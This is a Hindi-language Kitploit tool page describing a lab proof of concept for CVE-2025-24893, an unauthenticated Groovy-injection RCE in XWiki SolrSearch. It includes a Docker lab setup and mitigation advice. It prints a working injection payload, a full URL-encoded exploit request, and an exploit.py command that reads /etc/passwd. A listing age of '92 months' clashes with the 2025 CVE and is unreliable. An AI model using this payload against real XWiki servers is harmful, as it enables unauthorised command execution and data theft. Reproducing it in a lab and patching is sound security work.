Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
xwiki-cve-2025-24893 — XWiki SolrSearch (CVE-2025-24893) के लिए एक अप्रमाणित दूरस्थ कोड निष्पादन शोषण, text पैरामीटर में Groovy इंजेक्शन के माध्यम से, Docker-आधारित प्रयोगशाला वातावरण और PoC स्क्रिप्ट के साथ। | Kitploit
उपकरण/GitHubGitHub/endusdksla/xwiki-cve-2025-24893
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubendusdksla/xwiki-cve-2025-24893

xwiki-cve-2025-24893

XWiki SolrSearch (CVE-2025-24893) के लिए एक अप्रमाणित दूरस्थ कोड निष्पादन शोषण, text पैरामीटर में Groovy इंजेक्शन के माध्यम से, Docker-आधारित प्रयोगशाला वातावरण और PoC स्क्रिप्ट के साथ।

रिपॉजिटरी देखें
92 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XWiki SolrSearch बिना प्रमाणीकरण के RCE (CVE-2025-24893)


योगदानकर्ता

  • व्हाइटहैट स्कूल चौथा बैच, 25वीं कक्षा इम दुयोन (@endusdksla)

सारांश

  • XWiki विकि सिंटैक्स और मैक्रोज़ को सर्वर साइड पर व्याख्या करके रेंडर करता है। समस्या यह है कि Main.SolrSearch पृष्ठ मेहमानों के लिए खुला है, फिर भी यह उपयोगकर्ता इनपुट text पैरामीटर को पर्याप्त सत्यापन के बिना XWiki सिंटैक्स के रूप में मूल्यांकन करता है।
  • हमलावर text में {{groovy}} मैक्रो डालकर सर्वर पर मनमाना Groovy कोड निष्पादित कर सकता है, और "command".execute() के माध्यम से ऑपरेटिंग सिस्टम कमांड भी कॉल कर सकता है। यह भेद्यता बिना किसी अलग लॉगिन या टोकन के एकल GET अनुरोध के साथ शोषण योग्य है।

पर्यावरण सेटअप

यह निर्देशिका आधिकारिक XWiki स्टैंडअलोन वितरण 15.10.1 और Java 17 रनटाइम का उपयोग करके भेद्य वातावरण सेट करती है।

वस्तुविवरण
CVECVE-2025-24893
उत्पादXWiki Platform
भेद्य संस्करण>= 5.3-milestone-2, < 15.10.11 / >= 16.0.0-rc-1, < 16.4.1
पैच संस्करण15.10.11, 16.4.1
भेद्यता प्रकारEval Injection -> बिना प्रमाणीकरण के RCE
प्रमाणीकरण आवश्यकताआवश्यक नहीं
प्रभावसर्वर कमांड निष्पादन संभव

भेद्यता शर्तें

  • XWiki संस्करण पैच से पहले का होना चाहिए।
  • Main.SolrSearch एंडपॉइंट मेहमानों के लिए सुलभ होना चाहिए।
  • सर्वर text पैरामीटर को XWiki सिंटैक्स के रूप में मूल्यांकन करने में सक्षम होना चाहिए।
  • groovy मैक्रो निष्पादन योग्य स्थिति में होना चाहिए।

यह वातावरण XWiki 15.10.1 का उपयोग करता है, इसलिए यह उपरोक्त शर्तों को पूरा करता है।

पुनरुत्पादन प्रक्रिया

root@kitploit:~
docker compose up -d --build

प्रारंभिक निष्पादन पर स्वचालित स्थापना होती है, इसलिए इसमें कुछ मिनट लग सकते हैं (लगभग 6-7 मिनट)।

root@kitploit:~
docker compose ps
docker inspect -f '{{json .State.Health}}' xwiki-web

उपरोक्त आदेशों के परिणाम में "Status":"healthy" स्थिति दिखने पर पर्यावरण सेटअप पूर्ण हो जाता है और शोषण संभव होता है।

root@kitploit:~
pip install requests

exploit.py चलाने से पहले निर्भरता स्थापित करें।

PoC कोड

मुख्य पेलोड नीचे दिया गया है।

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("id".execute().text){{/groovy}}{{/async}}

उपरोक्त पेलोड text पैरामीटर में डाला जाता है और Main.SolrSearch पृष्ठ पर मूल्यांकित किया जाता है। परिणामस्वरूप, println("id".execute().text) सर्वर पर निष्पादित होता है, और कमांड निष्पादन परिणाम RSS प्रतिक्रिया निकाय में परावर्तित होता है।

पूर्ण निष्पादन स्क्रिप्ट के लिए exploit.py देखें।

root@kitploit:~
python3 exploit.py

उपरोक्त पायथन कोड चलाने से PoC का पुनरुत्पादन संभव है। डिफ़ॉल्ट कमांड id है।

root@kitploit:~
python3 exploit.py -c "cat /etc/passwd"

दूसरा कमांड निष्पादित करने के लिए, ऊपर दिखाए अनुसार तर्क पास करें।

या URL के माध्यम से अनुरोध भेजें (id आउटपुट करने वाला पेलोड)।

root@kitploit:~
http://localhost:1337/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

निष्पादन परिणाम

id को प्रतिक्रिया के रूप में भेजने का दृश्य

वर्तमान निर्देशिका फ़ाइलों की जाँच

शमन उपाय

  • XWiki को 15.10.11 या उससे ऊपर, या 16.4.1 या उससे ऊपर अपडेट करें।
  • बाहरी XWiki इंस्टेंस के मेहमान पहुँच नीति की जाँच करें।
  • अनावश्यक स्क्रिप्ट/मैक्रो निष्पादन अनुमतियों को कम करें।
  • संदिग्ध अनुरोधों और SolrSearch पहुँच लॉग की निगरानी करें।

संदर्भ

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • GitHub Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
टूल डाउनलोड करें